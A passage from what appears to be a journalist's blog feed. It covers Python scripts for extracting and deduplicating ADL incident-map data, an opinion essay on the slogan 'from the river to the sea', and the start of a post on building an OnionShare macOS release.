<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/8/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s2">"Swastikas were spray-painted on a playground."</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"St. Louis"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"Missouri"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Vandalism"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="n">is_duplicate</span><span class="p">(</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/8/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s2">"An individual wearing a Nazi uniform entered a restaurant."</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Forth Worth"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"Texas"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="s2">"10/8/23"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="s2">"Extremist individuals distributed antisemitic propaganda the Fort Worth Botanic Garden."</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="s2">"Forth Worth"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="s2">"Texas"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="s2">"Harassment"</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">))</span>
</pre></div>
<p>And here's what it looks like when I run this script:</p>
<pre><code>% python3 gpt4-test.py
The follow are real duplicates and should return True:
True
True
True
The follow are not duplicates and should return False:
False
False
</code></pre>
<p>The <code>is_duplicate()</code> function that GPT-4 wrote me appears to work. So I added it into my <code>extract-incidents.py</code> script.</p>
<p>Following the code that de-dupes exact matches, I wrote the following comment:</p>
<div class="hll"><pre><span></span><span class="c1"># Some of the rows are exact matches except they have different "Description" values.</span>
<span class="c1"># Use the is_duplicate function to dedupe these, keeping the row with the higher index.</span>
</pre></div>
<p>GitHub Copilot auto-suggested the following code to do the rest of the de-duping:</p>
<div class="hll"><pre><span></span><span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">row1</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">rows</span><span class="p">):</span>
<span class="k">for</span> <span class="n">j</span><span class="p">,</span> <span class="n">row2</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">rows</span><span class="p">):</span>
<span class="k">if</span> <span class="n">i</span> <span class="o"><</span> <span class="n">j</span><span class="p">:</span>
<span class="k">if</span> <span class="n">is_duplicate</span><span class="p">(</span><span class="n">row1</span><span class="p">,</span> <span class="n">row2</span><span class="p">):</span>
<span class="n">rows</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="n">j</span><span class="p">)</span>
</pre></div>
<p>In all, here is my final <code>extract-incidents.py</code> file:</p>
<div class="hll"><pre><span></span><span class="kn">import</span> <span class="nn">json</span>
<span class="kn">import</span> <span class="nn">csv</span>
<span class="kn">import</span> <span class="nn">difflib</span>
<span class="k">def</span> <span class="nf">is_duplicate</span><span class="p">(</span><span class="n">row1</span><span class="p">,</span> <span class="n">row2</span><span class="p">):</span>
<span class="c1"># Check if any field other than 'Description' is different</span>
<span class="k">for</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">row1</span><span class="p">:</span>
<span class="k">if</span> <span class="n">key</span> <span class="o">!=</span> <span class="s2">"Description"</span> <span class="ow">and</span> <span class="n">row1</span><span class="p">[</span><span class="n">key</span><span class="p">]</span> <span class="o">!=</span> <span class="n">row2</span><span class="p">[</span><span class="n">key</span><span class="p">]:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="c1"># Compare descriptions using a simple similarity measure</span>
<span class="n">similarity</span> <span class="o">=</span> <span class="n">difflib</span><span class="o">.</span><span class="n">SequenceMatcher</span><span class="p">(</span>
<span class="kc">None</span><span class="p">,</span> <span class="n">row1</span><span class="p">[</span><span class="s2">"Description"</span><span class="p">],</span> <span class="n">row2</span><span class="p">[</span><span class="s2">"Description"</span><span class="p">]</span>
<span class="p">)</span><span class="o">.</span><span class="n">ratio</span><span class="p">()</span>
<span class="c1"># Define a threshold for similarity (e.g., 0.8)</span>
<span class="n">threshold</span> <span class="o">=</span> <span class="mf">0.8</span>
<span class="k">return</span> <span class="n">similarity</span> <span class="o">>=</span> <span class="n">threshold</span>
<span class="k">def</span> <span class="nf">dedupe_exact_matches</span><span class="p">(</span><span class="n">items</span><span class="p">,</span> <span class="n">key</span><span class="p">):</span>
<span class="n">seen</span> <span class="o">=</span> <span class="nb">set</span><span class="p">()</span>
<span class="n">result</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">items</span><span class="p">:</span>
<span class="n">val</span> <span class="o">=</span> <span class="nb">tuple</span><span class="p">(</span><span class="n">item</span><span class="p">[</span><span class="n">k</span><span class="p">]</span> <span class="k">for</span> <span class="n">k</span> <span class="ow">in</span> <span class="n">key</span><span class="p">)</span>
<span class="k">if</span> <span class="n">val</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">seen</span><span class="p">:</span>
<span class="n">seen</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">val</span><span class="p">)</span>
<span class="n">result</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">item</span><span class="p">)</span>
<span class="k">return</span> <span class="n">result</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="c1"># Load html from file</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"map.html"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">html</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="c1"># Extract data from HTML</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">html</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s2">"</span><span class="se">\n</span><span class="s2">"</span><span class="p">):</span>
<span class="k">if</span> <span class="s2">"_Flourish_data = "</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="n">data_json</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"_Flourish_data = "</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span>
<span class="n">data_json</span> <span class="o">=</span> <span class="n">data_json</span><span class="o">.</span><span class="n">strip</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="c1"># strip trailing comma</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">json</span><span class="o">.</span><span class="n">loads</span><span class="p">(</span><span class="n">data_json</span><span class="p">)</span>
<span class="c1"># Save data points as CSV</span>
<span class="n">rows</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">headers</span> <span class="o">=</span> <span class="p">[</span>
<span class="s2">"Date of Incident"</span><span class="p">,</span>
<span class="s2">"Description"</span><span class="p">,</span>
<span class="s2">"City"</span><span class="p">,</span>
<span class="s2">"State"</span><span class="p">,</span>
<span class="s2">"Incident Type"</span><span class="p">,</span>
<span class="p">]</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"adl-data.csv"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">writer</span> <span class="o">=</span> <span class="n">csv</span><span class="o">.</span><span class="n">DictWriter</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">fieldnames</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writeheader</span><span class="p">()</span>
<span class="k">for</span> <span class="n">point</span> <span class="ow">in</span> <span class="n">data</span><span class="p">[</span><span class="s2">"points"</span><span class="p">]:</span>
<span class="n">row</span> <span class="o">=</span> <span class="p">{</span>
<span class="s2">"Date of Incident"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">0</span><span class="p">],</span>
<span class="s2">"Description"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span>
<span class="s2">"City"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">2</span><span class="p">],</span>
<span class="s2">"State"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">3</span><span class="p">],</span>
<span class="s2">"Incident Type"</span><span class="p">:</span> <span class="n">point</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">][</span><span class="mi">4</span><span class="p">],</span>
<span class="p">}</span>
<span class="n">rows</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writerow</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Number of rows: </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">rows</span><span class="p">)</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="c1"># Dedupe</span>
<span class="n">rows</span> <span class="o">=</span> <span class="n">dedupe_exact_matches</span><span class="p">(</span><span class="n">rows</span><span class="p">,</span> <span class="n">headers</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Number of rows after de-duping exact matches: </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">rows</span><span class="p">)</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="c1"># Some of the rows are exact matches except they have different "Description" values.</span>
<span class="c1"># Use the is_duplicate function to dedupe these, keeping the row with the higher index.</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">row1</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">rows</span><span class="p">):</span>
<span class="k">for</span> <span class="n">j</span><span class="p">,</span> <span class="n">row2</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">rows</span><span class="p">):</span>
<span class="k">if</span> <span class="n">i</span> <span class="o"><</span> <span class="n">j</span><span class="p">:</span>
<span class="k">if</span> <span class="n">is_duplicate</span><span class="p">(</span><span class="n">row1</span><span class="p">,</span> <span class="n">row2</span><span class="p">):</span>
<span class="n">rows</span><span class="o">.</span><span class="n">pop</span><span class="p">(</span><span class="n">j</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Number of rows after de-duping similar descriptions: </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">rows</span><span class="p">)</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="c1"># Save the de-duped CSV</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"adl-data-deduped.csv"</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">writer</span> <span class="o">=</span> <span class="n">csv</span><span class="o">.</span><span class="n">DictWriter</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">fieldnames</span><span class="o">=</span><span class="n">headers</span><span class="p">)</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writeheader</span><span class="p">()</span>
<span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">rows</span><span class="p">:</span>
<span class="n">writer</span><span class="o">.</span><span class="n">writerow</span><span class="p">(</span><span class="n">row</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</pre></div>
<p>And here's what it looks like when I run it:</p>
<pre><code>% python3 extract-incidents.py
Number of rows: 1502
Number of rows after de-duping exact matches: 1263
Number of rows after de-duping similar descriptions: 1226
</code></pre>
<p>The final <code>adl-data-deduped.csv</code> spreadsheet contains 1,226 rows of data.</p>
<p>Note that this is more data than from <a href="https://theintercept.com/2023/11/11/palestine-israel-protests-ceasefire-antisemitic/">my article</a> in The Intercept -- when I pulled this data on November 9 for that article, the spreadsheet had 1,163 rows of data. In the last 4 days, ADL has added 63 rows to their public dataset -- but, due to their conflation of antisemitism and anti-Zionist peace activism, it's hard to immediately know if this new data is the result of neo-Nazis, Jewish social justice activists, or something else.</p>
<h2 id="counting-rows-in-the-spreadsheet-again">Counting rows in the spreadsheet again</h2><p>Now that I have a de-duped version of the spreadsheet, I have counted the rows one more time. Here's what I found:</p>
<ul>
<li>Anti-Israel Rally: 448 (36.5%)</li>
<li>Anti-Israel Rally w. Support for Terror: 170 (13.9%)</li>
<li>Assault: 30 (2.4%)</li>
<li>Harassment: 406 (33.1%)</li>
<li>Vandalism: 172 (14.0%)</li>
</ul>
<p>If you're interested in what ADL means when they classify "anti-Israel rallies" as "with support for terror," go read my <a href="https://theintercept.com/2023/11/11/palestine-israel-protests-ceasefire-antisemitic/">original reporting</a>. ADL told me their criteria.</p>
<h2 id="the-rest-of-the-journalism">The rest of the journalism</h2><p>Extracting this data from ADL's online map -- what I've described in this blog post -- was just half of the work. The other half involved a lot of traditional investigative journalism work, including:</p>
<ul>
<li>Contacting ADL and asking them questions about their "antisemitic incidents and anti-Israel rallies" dataset, including specifically about their choice to include Jewish peace rallies.</li>
<li>Contacting organizers from the progressive Jewish groups IfNotNow and Jewish Voice for Peace to let them know that they're lumped in with hate groups by the ADL, and see what they have to say about it. Also, asking them for help identifying protests and direct actions around the US that were organized exclusively by Jews, or that were co-sponsored by Jews along with other groups.</li>
<li>Making a comprehensive list of social media accounts, mostly on Facebook, Instagram, and X, run by national and regional chapters of IfNotNow and Jewish Voice for Peace -- my list ended up with containing 71 different accounts.</li>
<li>Scouring every single post, on every single social media account, since October 7 looking for "anti-Israel rallies" in the ADL dataset that were organized by Jews -- I spent at least a solid 8 hours doing this.</li>
</ul>
<p>I kept track of all of this in a spreadsheet, marking which rows were confirmed organized by Jews, along with links to social media posts showing the event flyers with Jewish orgs listed as co-sponsors, and other links to media from the Jewish-organized protests. Once I had collected this data, along with relevant quotes from ADL and Jewish activists, I sat down and wrote my article.</p>
<h2 id="hacks-leaks-and-revelations">Hacks, Leaks, and Revelations</h2><p>This particular ADL dataset is completely public. Everyone has access to it -- that is, everyone who has the right skills -- and it wasn't a hacked or leaked dataset. But the data was buried inside a web page, inaccessible to most people. The skills it takes to analyze this are exactly the same as the skills you need to analyze hacked and leaked datasets.</p>
<p>If you want to get good at this sort of work, check out my book <a href="https://hacksandleaks.com/"><em>Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</em></a>. I wrote this book for journalists, researchers, hacktivists, and anyone else who wants to learn the technologies and coding skills required to investigate hacked, leaked, and entirely public datasets like this one. While it gets pretty technical, it's written for beginners with no prior knowledge required.</p>
Why we shouldn't use the slogan "from the river to the sea"2023-11-05T00:00:00ZMicah Leeurn:uuid:f6aff607-800f-3754-b5ce-3e83cbe3b9cd<p><em>Update November 21, 2023:</em> Based on some conversations I've had, I want to make clear that I'm not at all advocating for ceding "from the river to the sea" to be an antisemitic phrase. <a href="https://jewishcurrents.org/what-does-from-the-river-to-the-sea-really-mean">It's not</a>. Almost all of the complaints about protesters, <a href="https://twitter.com/RepRashida/status/1721998463649431647">politicians</a>, or <a href="https://theintercept.com/2019/01/24/what-you-cant-say-about-israel-with-marc-lamont-hill/">journalists</a> saying "from the river to the sea" being antisemitic are made in bad faith, and those people should be called out for it. My argument is that, since the slogan has an ambiguous meaning, strategically it's much better for the public debate to be focused on the unfolding genocide in Gaza instead of on whether or not so-and-so is antisemitic because they said "from the river to the sea."</p>
<hr>
<p>In the 1970s, some wingnuts founded a UFO cult called Raëlism. It's an atheistic religion that believes that aliens called the Elohim created humanity on Earth using advanced technology. Raëlism was started in France but has since became an international cult. They proposed building an embassy for the Elohim, complete with a spaceship landing pad, in Israel. However, the Israeli government wasn't too keen on the idea because the Raëlism symbol includes a swastika in it -- a hate symbol mostly widely associated with Nazi Germany, though the symbol first originated in ancient religions like Hinduism in India.</p>
<p>Instead, the Raëlism cult got some land on Hawaii's Big Island to build their embassy, which is called the <a href="https://travel.nine.com.au/destinations/hawaii-visit-ufo-peace-park-owned-by-cult/1dc73c5a-44be-44b4-90d8-a32506fee055">UFO Peace Park</a>. The land is full of statues which represent Raëlism beliefs, and also the Raëlism symbol, which is a Star of David mixed with a swastika. Here's a photo from the UFO Peace Park of a woman, with the Raëlism symbol, doing a salute that looks suspiciously like a fascist salute.</p>
<p><img src="ufopeacepark.jpg" alt="UFO Peace Park">
<em>Photo credit: <a href="https://www.flickr.com/photos/radloffphotography/">Michael Radloff</a></em></p>
<p>In all likelihood, the Raëlists don't use the swastika in their symbol as a coded nod to Hitler. According to the <a href="https://en.wikipedia.org/wiki/Ra%C3%ABlism">Wikipedia article</a> (which cites books that I don't easily have access to), this symbol was used by the (obviously invented) Elohim aliens:</p>
<blockquote><p>The symbol initially used to signify Raëlism was a six-pointed star with a swastika in the centre. Raël stated that this was the symbol he originally saw on the hull of the Elohim's spaceship. Raëlians regard this as a symbol of infinity. Practitioners also believe that this symbol helps facilitate their own telepathic contact with the Elohim. Raëlists typically wear a medallion of the symbol around their neck.</p>
</blockquote>
<p>Still, I don't at all blame Israel for not wanting anything to do with swastikas.</p>
<p>I'm sure there are people that misguidedly use the swastika with the intent of invoking other meanings like "infinity," "conductive to well-being," or "prosperity and luck." But the meaning that's front-and-center in most people's minds is <em>the Nazi Party, the Holocaust, the systematic murder of six million Jews, and today's neo-Nazis who still use it</em>.</p>
<p>The swastika has multiple meanings: the symbol's meaning is <em>ambiguous</em>. But one of those meanings, and <em>by far</em> the most prominent, is <em>fascism and genocide</em>. If you're using a swastika and intend to actually have it mean something else, <em>people won't understand and will think you're a Nazi</em>.</p>
<p>And for good reason. I'm skeptical as hell of the motivations behind anyone who tries to use the swastika.</p>
<p>If you want a symbol that means infinity, use "♾️" or really <em>anything else that isn't literally synonymous with Nazism</em>. If you use the swastika, people will <em>definitely</em> misinterpret your meaning, will be skeptical of your insistence that you're not a Nazi, and at the very least will question your judgement for choosing to use an ambiguous symbol where one if it's meanings is fascism and genocide.</p>
<p>Some people want to "reclaim" the swastika from the Nazis. But why? What's the point? And in any case, it's not going to work. People will always associate it with Nazism so anyone trying to reclaim it will be associated with Nazism too.</p>
<p>This brings to me to the popular slogan in the Palestinian liberation movement, "from the river to the sea." Like the swastika, this slogan also has an ambiguous meaning -- though, in my opinion, it's not nearly as stark. "From the river to the sea" refers to the area of land west of the Jordan River and east of the Mediterranean Sea, which makes up the boundaries of Israel and the occupied Palestinian territories, the West Bank and the Gaza Strip.</p>
<p><img src="occupied-palestinian-territories.jpg" alt="Map of the occupied Palestinian territories from 2011"></p>
<p>The slogan has been used in the Palestinian liberation movement since the 1960s. It has multiple meanings:</p>
<ul>
<li>The slogan is used by human rights activists that want everyone in Israel/Palestine (Jews, Arabs, and everyone else) to have equal human rights, normally under a single secular democracy. This, I believe, is by far the most common use of the slogan.</li>
<li>It's used by Islamic extremists, like Hamas and Palestinian Islamic Jihad, who explicitly advocate for genocide against Jews, and for a religious fundamentalist government. <em>The slogan has been officially adopted by Hamas, which has promised to wipe out Israel</em>, and has stated, "Palestine is ours from the river to the sea and from the south to the north. There will be no concession on any inch of the land."</li>
<li>It's lesser known, but it has also been used by Jewish extremists. Benjamin Netanyahu's right-wing extremist political party, Likud, used the slogan "between the Sea and the Jordan there will only be Israeli sovereignty" as part of its <a href="https://www.jewishvirtuallibrary.org/original-party-platform-of-the-likud-party">1977 platform</a>. Netanyahu's government is currently engaged in a genocide against Palestinians in Gaza.</li>
</ul>
<p>Most people who chant things like, "From the river to the sea, Palestine will be free," aren't advocating genocide against Jews and the destruction of the state of Israel. They're advocating for Palestinian freedom from the very real and brutal Israeli oppression they face, and for their human rights.</p>
<p>But some people <em>are</em> advocating for genocide against Jews and the destruction of Israel.</p>
<p>The fact that "from the river to the sea" is an official Hamas slogan makes it difficult to determine which side you're on: support for human rights, or support for genocide. This is because it's an ambiguous slogan. This ambiguity makes it easy for right wingers to claim that support for Palestinian human rights is actually coded support for genocide against Jews.</p>
<p>In other words, if you use the slogan, people will <em>definitely</em> misinterpret your meaning, no matter your intent. Often this will be in bad faith: they will accuse you of antisemitism and advocating genocide against Jews even if you're clearly not doing that. But it will also happen in good faith: it's a Hamas slogan, after all, and is frequently used by genocidal antisemitic people.</p>
<p>Arguing over the term "from the river to the sea" is a waste of time. Like or it not, the connotation of this phrase is ambiguous. To some people it means human rights for Palestinians, and to others it means genocide against Jews. If we want to communicate clearly, and build a mass movement <em>against genocide</em>, then what's the point of reclaiming a phrase that, for a large number of people, has genocidal connotations?</p>
<p>Instead, we should be clear and unambiguous with our language. "Never again" -- a slogan about the Holocaust -- means never again for anyone. Hamas shouldn't slaughter innocent Jews at a music festival, and Israel Defense Forces shouldn't indiscriminately drop bombs on hospitals and refugee camps and shouldn't be murdering thousands of innocent children. Let's use language that clearly opposes genocide and fascism, and supports human rights.</p>
<p>If a symbol (like the swastika) or a slogan (like "from the river to the sea") gets co-opted by genocidal fascists, it's better to no longer use them in passing, at least without providing additional context. There's a time and place for reclaiming phrases and symbols. But in the last month, Israeli forces have killed roughly 10,000 people in Gaza, including 4,800 children who are by definition innocent, and are displacing millions more.</p>
<p>There's plenty of language we can use (against genocide, against religious extremism, for human rights and secular democracy, for ceasefire) that doesn't have genocidal connotations.</p>
What goes into making an OnionShare release: Part 32023-10-20T00:00:00ZMicah Leeurn:uuid:907a0732-01dd-3c37-83c7-dde3884eaef0<p>About a month ago I started working on an OnionShare release, documenting the entire arduous process. It's always a painful process, but it's absolutely bonkers how much work has gone into this release. This is the third, and not quite final, part of this epic release engineering saga.</p>
<p>In <a href="https://web.archive.org/web/20231028233436/https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release/">part 1</a> of this series, I describe how I started making the release. I merged in translations from Weblate and made sure the correct translations were enabled for the desktop app and the documentation. After some struggling I got the Snapcraft release working--this involved upgrading the snap base from core20 to core22 so that I could upgrade the from PySide2 to PySide6. I then ran into a wall trying to get Flatpak working.</p>
<p>In <a href="https://web.archive.org/web/20231028233436/https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release-part-2/">part 2</a>, I finally finished Flatpak packaging, albeit with a bit of work still left for future Micah to solve. I successfully finished the Windows build, and I started making the macOS build. Where we last left off, OnionShare was running fine from the source tree on my Mac, but but after I used cx_Freeze to convert the Python source code into a runnable Mac app bundle, it crashed with a segmentation fault when I ran it.</p>
<p>⚠️ WARNING: This blog post, and this whole cursed series of posts, may make you want to smash your face against your keyboard due to the sheer volume of technical issues, error messages, and general injury to morale. Because of all of the problems I consistently have been running into, and also how complex making OnionShare releases has become, this blog post is stupidly long.</p>
<p>In this post I describe how I make a universal2 macOS app bundle that runs fine on both older Intel Macs and newer Apple Silicon Macs. This journey includes fixing a bug, and submitting an <a href="https://web.archive.org/web/20231028233436/https://github.com/marcelotduarte/cx_Freeze/pull/2102">upstream PR</a>, in the cx_Freeze project. I also discovered that if only OnionShare's GitHub organization were using a paid plan, I could automate a lot more of making the universal2 app bundle with GitHub Actions--but alas, we're not paying for it yet. (Hey GitHub, can we have a free Team plan?)</p>
<p>I decided that since so much work has gone into this release so far, and so much new code has been added, that instead of making a full release I will just make a development release, OnionShare 2.6.1.dev1. This way it can be more thoroughly tested before making a stable release. So, I made the dev release, complete with code signing binaries in Windows using a HARICA-trusted secret key on a USB smart card that I passed through to a Windows VM, and also code signing and notarizing the macOS app bundle.</p>
<p>Here's a table of contents:</p>
<ul>
<li><a href="#fixing-the-onionshare-mac-app-bundle">Fixing the OnionShare Mac app bundle</a><ul>
<li><a href="#freezing-the-python-code">Freezing the Python code</a></li>
<li><a href="#debugging-the-app-bundle">Debugging the app bundle</a></li>
<li><a href="#putting-it-all-together">Putting it all together</a></li>
<li><a href="#fixing-the-github-actions-build">Fixing the GitHub Actions build</a></li>
<li><a href="#testing-the-intel-mac-binary-from-github-actions">Testing the Intel Mac binary from GitHub Actions</a></li>
</ul>
</li>
<li><a href="#updating-dependencies-again">Updating dependencies again</a></li>
<li><a href="#adventures-in-arm64-and-github-actions">Adventures in ARM64 and GitHub Actions</a></li>
<li><a href="#building-onionshare-for-apple-silicon">Building OnionShare for Apple Silicon</a><ul>
<li><a href="#setting-up-the-development-environment">Setting up the development environment</a></li>
<li><a href="#building-the-app-bundle">Building the app bundle</a></li>
<li><a href="#fixing-cx-freeze">Fixing cx_Freeze</a></li>
<li><a href="#finishing-the-build">Finishing the build</a></li>
</ul>
</li>
<li><a href="#merging-app-bundles-into-a-universal2-mac-app-bundle">Merging app bundles into a universal2 Mac app bundle</a></li>
<li><a href="#making-a-development-release">Making a development release</a><ul>
<li><a href="#windows-release">Windows release</a><ul>
<li><a href="#setting-up-the-harica-smart-card">Setting up the HARICA smart card</a></li>
<li><a href="#code-signing-and-packaging">Code signing and packaging</a></li>
</ul>
</li>
<li><a href="#macos-release">macOS release</a><ul>
<li><a href="#building-the-apple-silicon-app-bundle">Building the Apple Silicon app bundle</a></li>
<li><a href="#creating-the-universal2-app-bundle">Creating the universal2 app bundle</a></li>
<li><a href="#fixing-macos-code-signing">Fixing macOS code signing</a></li>
<li><a href="#packaging-the-app">Packaging the app</a></li>
<li><a href="#notarizing-the-app">Notarizing the app</a></li>
<li><a href="#testing-it-out">Testing it out</a></li>
</ul>
</li>
<li><a href="#testing-flatpak">Testing Flatpak</a></li>
<li><a href="#testing-snapcraft">Testing Snapcraft</a></li>
</ul>
</li>
<li><a href="#onionshare-v2-6-1-dev1-released">OnionShare v2.6.1.dev1 released</a></li>
</ul>
<p>I'll start where I left off, with the macOS build.</p>
<h2 id="fixing-the-onionshare-mac-app-bundle">Fixing the OnionShare Mac app bundle</h2><p>As I described in <a href="https://web.archive.org/web/20231028233436/https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release-part-2/">part 2</a>, I have an old early 2015 MacBook Pro that I use as my dedicated macOS software release laptop. I made sure I had an up-to-date OnionShare development environment, and confirmed that I could run OnionShare locally from the source tree by changing to my <code>onionshare</code> folder and running:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>desktop
poetry<span class="w"> </span>run<span class="w"> </span>onionshare<span class="w"> </span>-v
</pre></div>
<p>This runs the OnionShare desktop Python script, and everything works great. To actually build the Mac app bundle, I run these commands:</p>
<div class="hll"><pre><span></span>poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./setup-freeze.py<span class="w"> </span>build
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./setup-freeze.py<span class="w"> </span>bdist_mac
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./scripts/build-macos.py<span class="w"> </span>cleanup-build
</pre></div>
<p>The first one, <code>./setup-freeze.py</code> build, freezes the Python code and creates a folder that has macOS Mach-O binary files in it (<code>onionshare</code> and <code>onionshare-cli</code>) that you can natively run on a Mac. This folder contains a copy of Python and all of the libraries and extra resources that OnionShare needs. The second command, <code>./setup-freeze.py bdist_mac</code> turns these binaries into an app bundle, and the third command, <code>./scripts/build-macos.py cleanup-build</code>, deletes unused files in the app bundle to save disk space.</p>
<p>When I left off, I got a segfault when trying to run the <code>onionshare</code> binary in the final app bundle. This time, I'm going to back up and see if I can get the binaries from <code>./setup-freeze.py build</code> to work, before I even make an app bundle.</p>
<h3 id="freezing-the-python-code">Freezing the Python code</h3><p>Since I'm using Python 3.11, that command puts the binaries in <code>build/exe.macosx-10.9-universal2-3.11</code>, so I'm starting by deleting that folder, just to clean up from last time:</p>
<div class="hll"><pre><span></span>rm<span class="w"> </span>-rf<span class="w"> </span>build/exe.macosx-10.9-universal2-3.11
</pre></div>
<p>Then I rebuilt the binaries:</p>
<pre><code>% poetry run python ./setup-freeze.py build
running build
running build_py
running build_exe
--snip--
WARNING: In file [/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6/QtXml.abi3.so] guessing that @rpath/libshiboken6.abi3.6.5.dylib resolved to /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/shiboken6/libshiboken6.abi3.6.5.dylib.
WARNING: In file [/Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/PySide6/QtWebEngineCore.abi3.so] guessing that @rpath/libshiboken6.abi3.6.5.dylib resolved to /Users/user/Library/Caches/pypoetry/virtualenvs/onionshare-aqknF-N0-py3.11/lib/python3.11/site-packages/shiboken6/libshiboken6.abi3.6.5.dylib.
</code></pre>
<p>There were a bunch of other similar warnings at the end of the command, but for now I'm going to ignore them and see if the binaries run. I'll start with <code>onionshare-cli</code>, since that takes far fewer dependencies than the desktop version and is more likely to work:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>build/exe.macosx-10.9-universal2-3.11
./onionshare-cli
